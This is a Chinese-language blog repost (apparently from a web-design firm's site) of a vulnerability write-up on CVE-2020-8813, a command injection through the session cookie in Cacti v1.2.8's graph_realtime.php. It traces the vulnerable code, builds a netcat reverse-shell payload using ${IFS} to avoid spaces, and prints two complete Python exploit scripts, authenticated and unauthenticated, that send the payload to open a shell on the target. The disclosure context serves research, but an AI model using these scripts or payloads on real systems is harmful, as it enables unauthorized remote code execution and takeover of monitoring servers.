如何進行Cactiv1.2.8中經(jīng)過身份驗證的RCE漏洞分析

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

網(wǎng)站建設哪家好,找創(chuàng)新互聯(lián)!專注于網(wǎng)頁設計、網(wǎng)站建設、微信開發(fā)、小程序開發(fā)、集團企業(yè)網(wǎng)站建設等服務項目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了定海免費建站歡迎大家使用!

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

關于Cacti

   Cacti是一套基于PHP,MySQL,SNMP及RRDTool開發(fā)的網(wǎng)絡流量監(jiān)測圖形分析工具。Cacti通過 snmpget來獲取數(shù)據(jù),使用 RRDtool繪畫圖形,而且你完全可以不需要了解RRDtool復雜的參數(shù)。它提供了非常強大的數(shù)據(jù)和用戶管理功能,可以指定每一個用戶能查看樹狀結構、host以及任何一張圖,還可以與LDAP結合進行用戶驗證,同時也能自己增加模板,功能非常強大完善。界面友好。軟件 Cacti 的發(fā)展是基于讓 RRDTool 使用者更方便使用該軟件,除了基本的 Snmp 流量跟系統(tǒng)資訊監(jiān)控外,Cacti 也可外掛 Scripts 及加上 Templates 來作出各式各樣的監(jiān)控圖。

cacti是用php語言實現(xiàn)的一個軟件,它的主要功能是用snmp服務獲取數(shù)據(jù),然后用rrdtool儲存和更新數(shù)據(jù),當用戶需要查看數(shù)據(jù)的時候用rrdtool生成圖表呈現(xiàn)給用戶。因此,snmp和rrdtool是cacti的關鍵。Snmp關系著數(shù)據(jù)的收集,rrdtool關系著數(shù)據(jù)存儲和圖表的生成。

漏洞利用分析

我在分析Cacti主要代碼中的多個功能函數(shù)時,發(fā)現(xiàn)了這個漏洞。我需要結合多個漏洞利用因素才能實現(xiàn)代碼執(zhí)行,當攻擊者嘗試向“Cacti”這個Cookie變量中注入惡意代碼時,便會觸發(fā)這個漏洞,而這個變量在與一些字符串合并之后將會被傳遞給shell_exec函數(shù)。但是當我嘗試修改這個cookie值時遇到了身份驗證的問題,而這個問題使我無法訪問到目標頁面,但是我發(fā)現(xiàn)這個包含漏洞的頁面是能夠以“Guest”身份訪問的,這樣就不需要進行身份驗證了,所以我修改了漏洞利用代碼,并使用“Guest”身份來訪問頁面“graph_realtime.php”,然后發(fā)送惡意請求來在目標主機上實現(xiàn)代碼執(zhí)行。

首先,我們需要向“user_admin.php”頁面發(fā)送一個請求來啟用“realtime_graph”的訪客權限,然后再向“graph_realtime.php”頁面發(fā)送惡意請求。

接下來,我使用了這個常用的RCE掃描腳本【RECScanner】來在Cacti中搜索RCE漏洞。

運行腳本后,我在“graph_realtime.php”文件中發(fā)現(xiàn)了一個非常有意思的東西:

graph_realtime.php

/* call poller */$graph_rrd = read_config_option('realtime_cache_path') . '/user_' . session_id() . '_lgi_' . get_request_var('local_graph_id') . '.png';$command   = read_config_option('path_php_binary');$args      = sprintf('poller_realtime.php --graph=%s --interval=%d --poller_id=' . session_id(), get_request_var('local_graph_id'), $graph_data_array['ds_step']);shell_exec("$command $args");/* construct the image name  */$graph_data_array['export_realtime'] = $graph_rrd;$graph_data_array['output_flag']     = RRDTOOL_OUTPUT_GRAPH_DATA;$null_param = array();

我們可以看到上述代碼中的第4和第5行,我們收到了一些參數(shù),還有一個名叫“get_request_var”的函數(shù),該函數(shù)的作用如下:

html_utility.php

function get_request_var($name, $default = '') {    global $_CACTI_REQUEST;    $log_validation = read_config_option('log_validation');    if (isset($_CACTI_REQUEST[$name])) {        return $_CACTI_REQUEST[$name];    } elseif (isset_request_var($name)) {        if ($log_validation == 'on') {            html_log_input_error($name);        }        set_request_var($name, $_REQUEST[$name]);        return $_REQUEST[$name];    } else {        return $default;    }}

我們可以看到,這個函數(shù)可以處理輸入數(shù)據(jù)并通過函數(shù)“set_request_var”來設置參數(shù)值,而這個函數(shù)的相關代碼如下:

html_utility.php

function set_request_var($variable, $value) {    global $_CACTI_REQUEST;    $_CACTI_REQUEST[$variable] = $value;    $_REQUEST[$variable]       = $value;    $_POST[$variable]          = $value;    $_GET[$variable]           = $value;}

接下來,回到我們的“graph_realtime.php”頁面,我們可以控制下列輸入:

local_graph_idThe value of $graph_data_array[‘ds_step’]

但是,我們注意到“graph_realtime.php”文件中的第4行,它使用了sprintf()函數(shù)來處理輸入,而第一個值“graph”的內容為“l(fā)ocal_graph_id”,而這個值是我們可以控制的!又但是,一個名叫“get_filter_request_var”的函數(shù)會對這個值進行過濾,我們可以看到,它在“graph_realtime.php”中已經(jīng)被過濾了:

html_utility.php

function get_filter_request_var($name, $filter = FILTER_VALIDATE_INT, $options = array()) {    if (isset_request_var($name)) {        if (isempty_request_var($name)) {            set_request_var($name, get_nfilter_request_var($name));            return get_request_var($name);        } elseif (get_nfilter_request_var($name) == 'undefined') {            if (isset($options['default'])) {                set_request_var($name, $options['default']);                return $options['default'];            } else {                set_request_var($name, '');                return '';            }        } else {            if (get_nfilter_request_var($name) == '0') {                $value = '0';            } elseif (get_nfilter_request_var($name) == 'undefined') {                if (isset($options['default'])) {                    $value = $options['default'];                } else {                    $value = '';                }            } elseif (isempty_request_var($name)) {                $value = '';            } elseif ($filter == FILTER_VALIDATE_IS_REGEX) {                if (is_base64_encoded($_REQUEST[$name])) {                    $_REQUEST[$name] = utf8_decode(base64_decode($_REQUEST[$name]));                }                $valid = validate_is_regex($_REQUEST[$name]);                if ($valid === true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                    $custom_error = $valid;                }            } elseif ($filter == FILTER_VALIDATE_IS_NUMERIC_ARRAY) {                $valid = true;                if (is_array($_REQUEST[$name])) {                    foreach($_REQUEST[$name] AS $number) {                        if (!is_numeric($number)) {                            $valid = false;                            break;                        }                    }                } else {                    $valid = false;                }                if ($valid == true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                }            } elseif ($filter == FILTER_VALIDATE_IS_NUMERIC_LIST) {                $valid = true;                $values = preg_split('/,/', $_REQUEST[$name], NULL, PREG_SPLIT_NO_EMPTY);                foreach($values AS $number) {                    if (!is_numeric($number)) {                        $valid = false;                        break;                    }                }                if ($valid == true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                }            } elseif (!cacti_sizeof($options)) {                $value = filter_var($_REQUEST[$name], $filter);            } else {                $value = filter_var($_REQUEST[$name], $filter, $options);            }        }        if ($value === false) {            if ($filter == FILTER_VALIDATE_IS_REGEX) {                $_SESSION['custom_error'] = __('The search term "%s" is not valid. Error is %s', html_escape(get_nfilter_request_var($name)), html_escape($custom_error));                set_request_var($name, '');                raise_message('custom_error');            } else {                die_html_input_error($name, get_nfilter_request_var($name));            }        } else {            set_request_var($name, $value);            return $value;        }    } else {        if (isset($options['default'])) {            set_request_var($name, $options['default']);            return $options['default'];        } else {            return;        }    }}

這個函數(shù)將會對輸入數(shù)據(jù)進行過濾,然后返回一個“干凈的”變量并傳遞給下一個函數(shù)。

對于第二個變量“$graph_data_array[‘ds_step’]”,它已經(jīng)通過sprintf()進行處理了(%d),這也就意味著它會變成一個十進制值,所以我們無法用它來注入我們的惡意命令。

接下來,我們再看看下面這段代碼:

graph_realtime.php

/* call poller */$graph_rrd = read_config_option('realtime_cache_path') . '/user_' . session_id() . '_lgi_' . get_request_var('local_graph_id') . '.png';$command   = read_config_option('path_php_binary');$args      = sprintf('poller_realtime.php --graph=%s --interval=%d --poller_id=' . session_id(), get_request_var('local_graph_id'), $graph_data_array['ds_step']);shell_exec("$command $args");/* construct the image name  */$graph_data_array['export_realtime'] = $graph_rrd;$graph_data_array['output_flag']     = RRDTOOL_OUTPUT_GRAPH_DATA;$null_param = array();

我們看到了另一個傳遞給shell_exec函數(shù)的變量,而這個變量的值就是session_id()函數(shù)返回的值,這個函數(shù)可以返回當前用戶會話的值,也就是說,我們可以用它來注入我們的命令。

等一下,如果我們修改了會話,那我們就無法訪問目標頁面了,因為這個頁面要求用戶在經(jīng)過了身份驗證之后才能訪問。研究之后我又發(fā)現(xiàn),如果我們啟用了一個名叫“Realtime Graphs”的特殊權限之后,我們就能夠以訪客身份訪問這個頁面了:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

接下來,我們嘗試在不開啟“Guest Realtime Graphs”權限的情況下訪問該頁面:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

正如我們所見,由于權限問題,我們現(xiàn)在無法訪問這個頁面,現(xiàn)在我們重新開啟該權限,然后訪問該頁面:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

很好,接下來我們發(fā)送“graph_realtime.php”頁面請求,然后在代碼中添加一條“echo”語句來輸出傳遞給shell_exec函數(shù)的值:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

如圖所示,我們將會話打印了出來,接下來我們嘗試向會話中注入自定義字符串:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

非常好,我們成功實現(xiàn)了注入。

Payload開發(fā)

成功控制了會話值之后,我們需要用它來在目標系統(tǒng)中實現(xiàn)代碼執(zhí)行,但由于它本質上還是一個會話值,因此我們無法使用一些特殊字符,所以我們需要開發(fā)一個“對會話友好的”Payload。

比如說,如果對字符串“Hi Payload”進行編碼,然后傳遞給應用程序,我們將會看到:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

我們可以看到,應用程序設置了一個Cookie給我們,而不是我們所注入的那個,為了解決這個問題,我們需要使用一個自定義的Payload。

為了避免使用空格字符,我打算使用“${IFS}”這個Bash變量來代表一個空格。

當然了,我們還需要使用“;”來轉義命令:

;payload

如果我們想使用netcat來獲取一個Shell,我們還需要創(chuàng)建下列Payload:

;nc${IFS}-e${IFS}/bin/bash${IFS}ip${IFS}port

我們先對Payload進行編碼:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

然后將其發(fā)送給應用程序:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

很好,我們的Payload執(zhí)行成功了,并拿到了一個Shell。

漏洞利用代碼

為了實現(xiàn)整個漏洞利用的自動化過程,我編寫了一個Python腳本來利用該漏洞:

#!/usr/bin/python3# Exploit Title: Cacti v1.2.8 Remote Code Execution# Date: 03/02/2020# Exploit Author: Askar (@mohammadaskar2)# CVE: CVE-2020-8813# Vendor Homepage: https://cacti.net/# Version: v1.2.8# Tested on: CentOS 7.3 / PHP 7.1.33import requestsimport sysimport warningsfrom bs4 import BeautifulSoupfrom urllib.parse import quotewarnings.filterwarnings("ignore", category=UserWarning, module='bs4')if len(sys.argv) != 6:    print("[~] Usage : ./Cacti-exploit.py url username password ip port")    exit()url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]ip = sys.argv[4]port = sys.argv[5]def login(token):    login_info = {    "login_username": username,    "login_password": password,    "action": "login",    "__csrf_magic": token    }    login_request = request.post(url+"/index.php", login_info)    login_text = login_request.text    if "Invalid User Name/Password Please Retype" in login_text:        return False    else:        return Truedef enable_guest(token):    request_info = {    "id": "3",    "section25": "on",    "section7": "on",    "tab": "realms",    "save_component_realm_perms": 1,    "action": "save",    "__csrf_magic": token    }    enable_request = request.post(url+"/user_admin.php?header=false", request_info)    if enable_request:        return True    else:        return Falsedef send_exploit():    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)    cookies = {'Cacti': quote(payload)}    requests.get(url+"/graph_realtime.php?action=init", cookies=cookies)request = requests.session()print("[+]Retrieving login CSRF token")page = request.get(url+"/index.php")html_content = page.textsoup = BeautifulSoup(html_content, "html5lib")token = soup.findAll('input')[0].get("value")if token:    print("[+]Token Found : %s" % token)    print("[+]Sending creds ..")    login_status = login(token)    if login_status:        print("[+]Successfully LoggedIn")        print("[+]Retrieving CSRF token ..")        page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms")        html_content = page.text        soup = BeautifulSoup(html_content, "html5lib")        token = soup.findAll('input')[1].get("value")        if token:            print("[+]Making some noise ..")            guest_realtime = enable_guest(token)            if guest_realtime:                print("[+]Sending malicous request, check your nc ;)")                send_exploit()            else:                print("[-]Error while activating the malicous account")        else:            print("[-] Unable to retrieve CSRF token from admin page!")            exit()    else:        print("[-]Cannot Login!")else:    print("[-] Unable to retrieve CSRF token!")exit()

運行了漏洞利用代碼之后,我們將會看到:

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

再一次成功拿到了Shell!

未經(jīng)身份認證的漏洞利用

如果Cacti啟用了“Guest Realtime Graphs”權限,那么我們就可以在未經(jīng)身份驗證的情況下利用該漏洞了。下面給出的是這種場景下的漏洞利用代碼:

#!/usr/bin/python3# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution# Date: 03/02/2020# Exploit Author: Askar (@mohammadaskar2)# CVE: CVE-2020-8813# Vendor Homepage: https://cacti.net/# Version: v1.2.8# Tested on: CentOS 7.3 / PHP 7.1.33import requestsimport sysimport warningsfrom bs4 import BeautifulSoupfrom urllib.parse import quotewarnings.filterwarnings("ignore", category=UserWarning, module='bs4')if len(sys.argv) != 4:    print("[~] Usage : ./Cacti-exploit.py url ip port")    exit()url = sys.argv[1]ip = sys.argv[2]port = sys.argv[3]def send_exploit(url):    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)    cookies = {'Cacti': quote(payload)}    path = url+"/graph_realtime.php?action=init"    req = requests.get(path)    if req.status_code == 200 and "poller_realtime.php" in req.text:        print("[+] File Found and Guest is enabled!")        print("[+] Sending malicous request, check your nc ;)")        requests.get(path, cookies=cookies)    else:        print("[+] Error while requesting the file!")send_exploit(url)

如何進行Cacti v1.2.8 中經(jīng)過身份驗證的RCE漏洞分析

我們可以看到,在這種場景下同樣能夠成功利用該漏洞。

漏洞披露

在發(fā)現(xiàn)該問題之后,我們便將完整的PoC上報給了Cacti的團隊,他們也在第一時間修復了該漏洞并發(fā)布了漏洞補丁,從Cacti v1.2.10開始將不再受此漏洞的影響。

    

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝您對創(chuàng)新互聯(lián)的支持。

標題名稱:如何進行Cactiv1.2.8中經(jīng)過身份驗證的RCE漏洞分析
文章地址:http://bm7419.com/article4/gighoe.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供營銷型網(wǎng)站建設、網(wǎng)站制作、電子商務、做網(wǎng)站、品牌網(wǎng)站建設、響應式網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

外貿網(wǎng)站建設